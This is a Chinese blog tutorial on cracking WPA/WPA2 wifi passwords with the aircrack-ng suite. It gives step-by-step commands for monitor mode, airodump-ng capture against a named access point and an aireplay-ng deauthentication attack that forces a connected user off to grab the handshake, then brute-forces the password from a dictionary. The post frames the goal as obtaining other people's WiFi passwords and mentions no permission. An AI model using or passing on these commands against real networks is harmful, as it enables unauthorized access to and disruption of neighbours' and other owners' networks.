【无线攻防】使用aircrack-ng工具破解wifi密码

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/nuoya_1995/article/details/52402728

目前无线网络加密技术日益成熟。以前的wep加密方式日渐淘汰,因为这种加密方式非常容易破解,当然现在还是有不少使用这种加密方式无线网络。现在大部分的无线网络都是使用wpa/wpa2方式来加密的,这种加密方式安全系数高,很难破解,当然这也不是不可能的。

本文将教大家破解用wpa/wpa2加密方式的wifi密码。

现在就让我们开始吧!

工具(海淘回来的网卡):

工具:TL-WN722N 150M高增益USB无线网卡;

自己拍的图,如图1,TPLINK官网找的图,如图2;

第一步:

把USB网卡连接到电脑就能开始用了。

iwconfig,查看网卡有没有加载进来;

第二步:

airmon-ng start wlan0,开启网卡wlan0;

第三步:

airodump-ng wlan0mon,抓周围wif信号;

第一次抓周围wifi的时候失败了,我查看了一下,原因是有进程占用了网卡。

第四步:

airmon-ng check kill,杀死占用网卡的进程;

第五步:

airodump-ng wlan0mon,再次开启监控;

成功监控到,截图如下:

见谅一下我打的马赛克~~~~~~~~~~~~~~

第六步:

airodump-ng -c 6 --bssid 7C:A2:3E:87:5E:C0 -w tutu wlan0mon,对其中的一个wifi进行抓包;

-c 6 是它的CH,也就是信道;

--bssid 7C:A2:3E:87:5E:C0     AP的mac地址;

-w tutu 文件名称是tutu;

wlan0mon 网卡的名称;

抓包截图如下:

第七步:

假如你够幸运的话,有人连接wifi的话,在第六步就能抓到握手包。很显然我不是那个幸运的人,没办法,只能把wifi里连着的主机踢下去,等他再次连wifi的时候,就能成功滴抓到握手包啦。

踢人的命令:aireplay-ng -0 10 -a AP的mac地址 -c 你要踢掉的主机的mac地址 wlan0mon,成功踢掉,一踢掉他又自动连接了,这时候我成功滴抓到了握手包。截图如下:

第八步:

将抓到的包跑词典,爆破密码,截图如下:

就这样获取别人的WiFi密码啦~~~~

展开阅读全文

没有更多推荐了,返回首页